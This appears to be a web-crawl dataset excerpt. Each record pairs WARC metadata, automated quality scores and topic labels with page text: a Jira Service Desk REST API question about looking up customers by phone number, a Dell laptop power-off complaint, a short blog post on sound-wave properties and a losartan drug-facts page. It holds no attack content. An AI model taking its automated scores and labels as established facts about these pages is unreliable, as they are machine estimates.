"WARC-Record-ID": "<urn:uuid:73f35228-2c7a-4698-a95b-b95605bb8ba0>",
"WARC-Target-URI": "https://forum.red-gate.com/discussion/81952/how-to-skip-replication-identity-constraints-in-sql-compare",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:c7ef8fe2-2c1b-47e8-baf8-9aef5cf57607>"
},
"warc_info": "isPartOf: CC-MAIN-2020-45\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for October 2020\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-124.ec2.internal\r\nsoftware: Apache Nutch 1.17 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
60,
61,
69,
70,
255,
256,
260,
261,
271,
419,
422,
432,
595,
598,
599,
683,
684,
685,
692,
701,
709,
710,
718,
719
],
"line_end_idx": [
60,
61,
69,
70,
255,
256,
260,
261,
271,
419,
422,
432,
595,
598,
599,
683,
684,
685,
692,
701,
709,
710,
718,
719,
750
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 750,
"ccnet_original_nlines": 24,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.1805555671453476,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.1388888955116272,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.3402777910232544,
"rps_doc_frac_unique_words": 0.6842105388641357,
"rps_doc_mean_word_length": 6.06315803527832,
"rps_doc_num_sentences": 5,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.053867340087891,
"rps_doc_word_count": 95,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.1111111119389534,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.0520833283662796,
"rps_doc_frac_chars_top_3gram": 0.0833333283662796,
"rps_doc_frac_chars_top_4gram": 0.09375,
"rps_doc_books_importance": -78.05431365966797,
"rps_doc_books_importance_length_correction": -78.05435943603516,
"rps_doc_openwebtext_importance": -56.31709671020508,
"rps_doc_openwebtext_importance_length_correction": -56.317138671875,
"rps_doc_wikipedia_importance": -33.98078536987305,
"rps_doc_wikipedia_importance_length_correction": -33.98082733154297
},
"fasttext": {
"dclm": 0.0587802492082119,
"english": 0.7932724356651306,
"fineweb_edu_approx": 1.0534181594848633,
"eai_general_math": 0.007766540162265301,
"eai_open_web_math": 0.28482943773269653,
"eai_web_code": 0.0018956100102514029
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.74",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "5",
"label": "Social/Forum"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "2",
"label": "Click Here References"
},
"secondary": {
"code": "0",
"label": "No missing content"
}
},
"document_type_v2": {
"primary": {
"code": "18",
"label": "Q&A Forum"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "1",
"label": "No Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "6",
"label": "Not Applicable/Indeterminate"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "4",
"label": "Graduate/Expert Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-8,511,480,572,239,409,000
|
Create
cancel
Showing results for
Search instead for
Did you mean:
Sign up Log in
Celebration
Earn badges and make progress
You're on your way to the next level! Join the Kudos program to earn points and save your progress.
Deleted user Avatar
Deleted user
Level 1: Seed
25 / 150 points
Next: Root
Avatar
1 badge earned
Collect
Participate in fun challenges
Challenges come and go, but your rewards stay with you. Do more to earn more!
Challenges
Coins
Gift kudos to your peers
What goes around comes around! Share the love by gifting kudos to your peers.
Recognition
Ribbon
Rise up in the ranks
Keep earning points to reach the top of the leaderboard. It resets every quarter so you always have a chance!
Leaderboard
Come for the products,
stay for the community
The Atlassian Community can help you and your team get more value out of Atlassian products and practices.
Atlassian Community about banner
4,557,802
Community Members
Community Events
184
Community Groups
How to get customer information using the phone number from service desk rest api?
Edited
I have a customer phone number and I need to get the details of the customer like customer info, issues, tickets etc. by using service desk rest api
1 answer
0 votes
Andy Heinzer
Atlassian Team
Atlassian Team members are employees working across the company in a wide variety of roles.
Feb 25, 2020
Hi @harish287
I understand you are using Jira Service Desk and are looking to be able to retrieve customer data based off their phone number via the REST API.
Natively, Jira Cloud and Jira Server do not store a user's phone number anywhere in the account information. So this is not typically something we can typically find via the REST API. That said, perhaps you're using a 3rd party add-on to Jira such as Service Desk LastChangeCallCenter for Jira Service Desk, or some other Marketplace add-on that might store this data within Jira's database. If that is the case, then certainly your Jira environment might have this data appearing within the application.
Add-ons for Jira have various different ways they could potentially be storing this kind of data. Because of this, the answer to your question isn't yet clear. It might be possible to do this via the REST API, but then again, the add-on might not be store this data in a manner that we can actually query from REST. Also, user data retrieval in Jira Cloud (as opposed to Jira Server) tends to be a bit more restrictive with the GDPR changes Jira Cloud has rolled out in the last year or so. These changes were made to help protect user privacy and are detailed more in Deprecation notice and migration guide for major changes to Jira Cloud REST APIs to improve user privacy. So the answer here might also very much depend on your platform (Jira Cloud vs Jira Server/Data Center) here.
If you can let me know more about your environment, such as platform and add-ons present, perhaps I can research some more to find a better answer. Please let me know.
Andy
Hi, @Andy
I'm using node js, and coming to the add-on I'm using the CallCenter for Jira Service Desk.I have to manage the issues based on the phone number of the user.For example whenever the user calls service desk. I have to take the phone number as a parameter.Then we have to find out the open issues of that user.
I have almost tried every possible option. But I couldn't achieve that task.
Thanks,
Harish
Suggest an answer
Log in or Sign up to answer
TAGS
AUG Leaders
Atlassian Community Events
|
{
"url": "https://community.atlassian.com/t5/New-to-Jira-Service-Management/How-to-get-customer-information-using-the-phone-number-from/qaq-p/1303759",
"source_domain": "community.atlassian.com",
"snapshot_id": "CC-MAIN-2023-23",
"warc_metadata": {
"Content-Length": "174244",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:R2EWC6FPUCQQTL5UGYCZBTX76P4XJZKE",
"WARC-Concurrent-To": "<urn:uuid:7fe26552-6522-46ce-a539-2a6ab106ce6f>",
"WARC-Date": "2023-06-06T04:21:29Z",
"WARC-IP-Address": "108.138.64.10",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:JQLRQM2JHVT6DMBP6EMF67O2QXGV4JR2",
"WARC-Record-ID": "<urn:uuid:414d4f51-5114-4107-b55a-723d4030538c>",
"WARC-Target-URI": "https://community.atlassian.com/t5/New-to-Jira-Service-Management/How-to-get-customer-information-using-the-phone-number-from/qaq-p/1303759",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:b4cf153c-741b-4125-b9ab-50d62f685b5f>"
},
"warc_info": "isPartOf: CC-MAIN-2023-23\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for May/June 2023\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-229\r\nsoftware: Apache Nutch 1.19 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.4-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
7,
14,
35,
55,
70,
85,
97,
98,
128,
129,
229,
230,
250,
263,
264,
278,
279,
295,
296,
307,
308,
315,
316,
331,
332,
340,
341,
371,
372,
450,
451,
462,
468,
469,
494,
495,
573,
574,
586,
593,
594,
615,
616,
726,
727,
739,
740,
763,
786,
787,
894,
895,
928,
938,
956,
958,
975,
979,
996,
997,
1080,
1081,
1088,
1089,
1239,
1240,
1242,
1243,
1252,
1253,
1261,
1274,
1289,
1381,
1394,
1395,
1410,
1411,
1557,
1558,
2066,
2067,
2857,
2858,
3027,
3028,
3033,
3034,
3044,
3353,
3354,
3431,
3432,
3440,
3447,
3448,
3466,
3467,
3495,
3500,
3512,
3513
],
"line_end_idx": [
7,
14,
35,
55,
70,
85,
97,
98,
128,
129,
229,
230,
250,
263,
264,
278,
279,
295,
296,
307,
308,
315,
316,
331,
332,
340,
341,
371,
372,
450,
451,
462,
468,
469,
494,
495,
573,
574,
586,
593,
594,
615,
616,
726,
727,
739,
740,
763,
786,
787,
894,
895,
928,
938,
956,
958,
975,
979,
996,
997,
1080,
1081,
1088,
1089,
1239,
1240,
1242,
1243,
1252,
1253,
1261,
1274,
1289,
1381,
1394,
1395,
1410,
1411,
1557,
1558,
2066,
2067,
2857,
2858,
3027,
3028,
3033,
3034,
3044,
3353,
3354,
3431,
3432,
3440,
3447,
3448,
3466,
3467,
3495,
3500,
3512,
3513,
3539
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 3539,
"ccnet_original_nlines": 102,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.42514124512672424,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.029661020264029503,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.12570621073246002,
"rps_doc_frac_unique_words": 0.4484451711177826,
"rps_doc_mean_word_length": 4.571194648742676,
"rps_doc_num_sentences": 33,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.160411834716797,
"rps_doc_word_count": 611,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.023630499839782715,
"rps_doc_frac_chars_top_3gram": 0.015037589706480503,
"rps_doc_frac_chars_top_4gram": 0.013963479548692703,
"rps_doc_books_importance": -344.8963317871094,
"rps_doc_books_importance_length_correction": -344.8963317871094,
"rps_doc_openwebtext_importance": -193.580078125,
"rps_doc_openwebtext_importance_length_correction": -193.580078125,
"rps_doc_wikipedia_importance": -120.87940216064453,
"rps_doc_wikipedia_importance_length_correction": -120.87940216064453
},
"fasttext": {
"dclm": 0.06765835732221603,
"english": 0.9264010190963745,
"fineweb_edu_approx": 1.0200079679489136,
"eai_general_math": 0.004218759946525097,
"eai_open_web_math": 0.07316576689481735,
"eai_web_code": 0.008209049701690674
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.758",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "5",
"label": "Social/Forum"
},
"secondary": {
"code": "4",
"label": "Code/Software"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "18",
"label": "Q&A Forum"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
4,215,603,457,557,050,400
|
ggarman
1 Copper
Inspiron 11 - 3147 Power off but still on!!!????
Just installed Windows 10 Home with the anniversary release and upgraded BIOS to A10. Now, the really weird part is if I power it off completely it is still running somehow because the case is warm back around the CPU vent slots. It isn't plugged in charging, Windows goes through its shutdown normally, screen goes completely black, all lights are off, but it stays warm and eventually drains the battery. I've also had the difficulties resuming from sleep like others have had.
Has anyone else had the "staying on after power off" issue?
Is reverting to A07 BIOS the only solution? Is A11 coming out soon with the fix?
Thanks!
0 Kudos
|
{
"url": "https://www.dell.com/community/Laptops-General-Read-Only/Inspiron-11-3147-Power-off-but-still-on/td-p/5007338",
"source_domain": "www.dell.com",
"snapshot_id": "crawl=CC-MAIN-2019-35",
"warc_metadata": {
"Content-Length": "107865",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:PPXIHOEXHBD4OVOEVOIS4F4X36H32VEE",
"WARC-Concurrent-To": "<urn:uuid:9b530a62-f011-4e79-a8f8-e071885b18ec>",
"WARC-Date": "2019-08-18T15:59:16Z",
"WARC-IP-Address": "104.118.212.11",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:P5KK7TJD4QSIYWYRI4BNQJFBW33J3BXL",
"WARC-Record-ID": "<urn:uuid:7d1ff46d-061d-42b0-a21f-e37662b04b0f>",
"WARC-Target-URI": "https://www.dell.com/community/Laptops-General-Read-Only/Inspiron-11-3147-Power-off-but-still-on/td-p/5007338",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:bccaf537-d040-4d6d-b2e3-8f0b11ebe500>"
},
"warc_info": "isPartOf: CC-MAIN-2019-35\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for August 2019\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-85.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
8,
17,
18,
67,
68,
552,
553,
613,
614,
696,
697,
705,
706
],
"line_end_idx": [
8,
17,
18,
67,
68,
552,
553,
613,
614,
696,
697,
705,
706,
713
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 713,
"ccnet_original_nlines": 13,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.4097222089767456,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.055555559694767,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.1666666716337204,
"rps_doc_frac_unique_words": 0.7317073345184326,
"rps_doc_mean_word_length": 4.504065036773682,
"rps_doc_num_sentences": 10,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.318253517150879,
"rps_doc_word_count": 123,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.02888086996972561,
"rps_doc_frac_chars_top_3gram": 0,
"rps_doc_frac_chars_top_4gram": 0,
"rps_doc_books_importance": -72.291015625,
"rps_doc_books_importance_length_correction": -72.55790710449219,
"rps_doc_openwebtext_importance": -39.29909896850586,
"rps_doc_openwebtext_importance_length_correction": -39.56598663330078,
"rps_doc_wikipedia_importance": -38.391239166259766,
"rps_doc_wikipedia_importance_length_correction": -38.65813064575195
},
"fasttext": {
"dclm": 0.42497527599334717,
"english": 0.9661822319030762,
"fineweb_edu_approx": 1.0624054670333862,
"eai_general_math": 0.08894730359315872,
"eai_open_web_math": 0.25017327070236206,
"eai_web_code": 0.028520820662379265
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "004.16",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
},
"secondary": {
"code": "005.456",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "1",
"label": "Factual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "5",
"label": "Social/Forum"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "18",
"label": "Q&A Forum"
},
"secondary": {
"code": "21",
"label": "Customer Support"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "1",
"label": "No Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "6",
"label": "Not Applicable/Indeterminate"
},
"secondary": {
"code": "2",
"label": "Partially Correct"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
8,612,478,173,378,835,000
|
sound waves
Sound is converted into electricity by a telephone and then transmitted as an analog signal.
These waves have 3 fundamental characteristics:
1. Amplitude, meaning the height (intensity) of the wave
2. Frequency, which is the number of waves that pass in a single second and is measured in Hertz (cycles/second) (wavelength, the length of the wave from crest to crest, is related to frequency.).
3. Phase is a third characteristic that describes the point in the wave’s cycle at which a wave begins and is measured in degrees. (For example, changing a wave’s cycle from crest to trough corresponds to a 180 degree phase shift).
wave
2 thoughts on “sound waves
1. Hello alicia I am sorry about replying late , the next blog on the subject of modulation is still under process . I shall email notify you as soon as it publishes 🙂
Leave a Reply
Fill in your details below or click an icon to log in:
WordPress.com Logo
You are commenting using your WordPress.com account. Log Out / Change )
Google photo
You are commenting using your Google account. Log Out / Change )
Twitter picture
You are commenting using your Twitter account. Log Out / Change )
Facebook photo
You are commenting using your Facebook account. Log Out / Change )
Connecting to %s
This site uses Akismet to reduce spam. Learn how your comment data is processed.
|
{
"url": "https://telecom.altanai.com/2012/07/11/sound-waves/",
"source_domain": "telecom.altanai.com",
"snapshot_id": "crawl=CC-MAIN-2020-34",
"warc_metadata": {
"Content-Length": "173941",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:VTJZ447HXDM5UGFWVLNE7UO673ACOC75",
"WARC-Concurrent-To": "<urn:uuid:c6e2935d-8284-4347-9103-dd5cd2e845a0>",
"WARC-Date": "2020-08-05T14:32:45Z",
"WARC-IP-Address": "192.0.78.24",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:BAULFWZY3NEUFOJBXRT36GC3KM4JMDMH",
"WARC-Record-ID": "<urn:uuid:6d0abe46-f53e-4140-aaf9-5dd5b0be176d>",
"WARC-Target-URI": "https://telecom.altanai.com/2012/07/11/sound-waves/",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:035f07e8-92b1-440f-baf3-8935dbed6e07>"
},
"warc_info": "isPartOf: CC-MAIN-2020-34\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for August 2020\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-208.ec2.internal\r\nsoftware: Apache Nutch 1.17 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
12,
13,
106,
107,
155,
156,
215,
414,
648,
649,
651,
652,
657,
658,
685,
686,
856,
857,
871,
872,
927,
928,
947,
948,
1021,
1022,
1035,
1036,
1102,
1103,
1119,
1120,
1187,
1188,
1203,
1204,
1272,
1273,
1290,
1291
],
"line_end_idx": [
12,
13,
106,
107,
155,
156,
215,
414,
648,
649,
651,
652,
657,
658,
685,
686,
856,
857,
871,
872,
927,
928,
947,
948,
1021,
1022,
1035,
1036,
1102,
1103,
1119,
1120,
1187,
1188,
1203,
1204,
1272,
1273,
1290,
1291,
1371
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 1371,
"ccnet_original_nlines": 40,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.3613138794898987,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.007299270015209913,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.18978102505207062,
"rps_doc_frac_unique_words": 0.5644444227218628,
"rps_doc_mean_word_length": 4.711111068725586,
"rps_doc_num_sentences": 17,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.577127933502197,
"rps_doc_word_count": 225,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.1037735790014267,
"rps_doc_frac_chars_dupe_6grams": 0.056603770703077316,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.022641509771347046,
"rps_doc_frac_chars_top_3gram": 0.06037735939025879,
"rps_doc_frac_chars_top_4gram": 0.07924527674913406,
"rps_doc_books_importance": -124.5092544555664,
"rps_doc_books_importance_length_correction": -124.50836944580078,
"rps_doc_openwebtext_importance": -77.4583740234375,
"rps_doc_openwebtext_importance_length_correction": -77.4583740234375,
"rps_doc_wikipedia_importance": -62.93217086791992,
"rps_doc_wikipedia_importance_length_correction": -62.41250991821289
},
"fasttext": {
"dclm": 0.3946954011917114,
"english": 0.8923683166503906,
"fineweb_edu_approx": 2.646205425262451,
"eai_general_math": -0.000010009999641624745,
"eai_open_web_math": 0.10685253143310547,
"eai_web_code": -0.000010009999641624745
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "534.0",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Physics",
"level_3": "Sound"
}
},
"secondary": {
"code": "530.0",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Physics",
"level_3": ""
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "1",
"label": "Remember"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "1",
"label": "Factual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "16",
"label": "Personal Blog"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "1",
"label": "No Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "2",
"label": "High School Level"
},
"secondary": {
"code": "1",
"label": "General Audience"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
3,133,876,298,294,846,000
|
losartan, Cozaar: Get Drug Facts, Side Effects, and Dosing
losartan, Cozaar
Pharmacy Author:
Medical and Pharmacy Editor:
Medical and Pharmacy Editor:
GENERIC NAME: losartan
BRAND NAME: Cozaar
DRUG CLASS AND MECHANISM: Losartan is an oral medication that belongs to a class of drugs called angiotensin receptor blockers (ARBs). Other ARBs include irbesartan (Avapro), valsartan (Diovan), and candesartan (Atacand). Angiotensin formed in the blood by the action of angiotensin converting enzyme (ACE) is a powerful chemical that attaches to angiotensin receptors found in many tissues but primarily on smooth muscle cells of blood vessels. Angiotensin's attachment to the receptors causes the muscle cells to contract and the blood vessels to narrow (vasoconstrict) which leads to an increase in blood pressure (hypertension). Losartan (more specifically, the chemical formed when the liver converts the inactive losartan into its active form) blocks the angiotensin receptor. By blocking the action of angiotensin, losartan relaxes muscle cells and dilates blood vessels thereby reducing blood pressure.
Losartan was approved by the FDA in April 1995.
PRESCRIBED FOR: Losartan is used for:
• Treating hypertension and reducing the risk of stroke in patients with hypertension and left ventricular hypertrophy (over developed heart muscle).
• Treating diabetic nephropathy (kidney disease) in people with hypertension and type 2 diabetes.
Medically Reviewed by a Doctor on 12/18/2014
Report Problems to the Food and Drug Administration
You are encouraged to report negative side effects of prescription drugs to the FDA. Visit the FDA MedWatch website or call 1-800-FDA-1088.
Pill Finder Tool
Need help identifying pills and medications?
Use the pill identifier tool on RxList.
Back to Medications Index
|
{
"url": "http://www.medicinenet.com/losartan/article.htm",
"source_domain": "www.medicinenet.com",
"snapshot_id": "crawl=CC-MAIN-2015-22",
"warc_metadata": {
"Content-Length": "88687",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:XGJJ6L6ROJ46EXRSNVLTUUHLRJP4FO4D",
"WARC-Concurrent-To": "<urn:uuid:4f5a19d9-d822-4329-a09a-6e8e36a82a7a>",
"WARC-Date": "2015-05-30T16:40:58Z",
"WARC-IP-Address": "184.29.164.107",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:XJZHRVZWVJB2B2YED6FBMBMNQ5ZPJXPF",
"WARC-Record-ID": "<urn:uuid:5b9367a5-a5a5-4e99-994f-d1559ff831fe>",
"WARC-Target-URI": "http://www.medicinenet.com/losartan/article.htm",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:7d84c12e-254f-4b7a-acf1-c8bf771a70e2>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-180-206-219.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2015-22\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web for May 2015\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
61,
62,
79,
80,
97,
126,
155,
156,
179,
180,
199,
200,
1111,
1112,
1160,
1161,
1199,
1200,
1352,
1452,
1497,
1498,
1499,
1500,
1552,
1553,
1693,
1694,
1711,
1712,
1757,
1797,
1798,
1799
],
"line_end_idx": [
61,
62,
79,
80,
97,
126,
155,
156,
179,
180,
199,
200,
1111,
1112,
1160,
1161,
1199,
1200,
1352,
1452,
1497,
1498,
1499,
1500,
1552,
1553,
1693,
1694,
1711,
1712,
1757,
1797,
1798,
1799,
1824
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 1824,
"ccnet_original_nlines": 34,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.26006191968917847,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.046439629048109055,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.18885448575019836,
"rps_doc_frac_unique_words": 0.5692883729934692,
"rps_doc_mean_word_length": 5.550561904907227,
"rps_doc_num_sentences": 14,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.684855937957764,
"rps_doc_word_count": 267,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
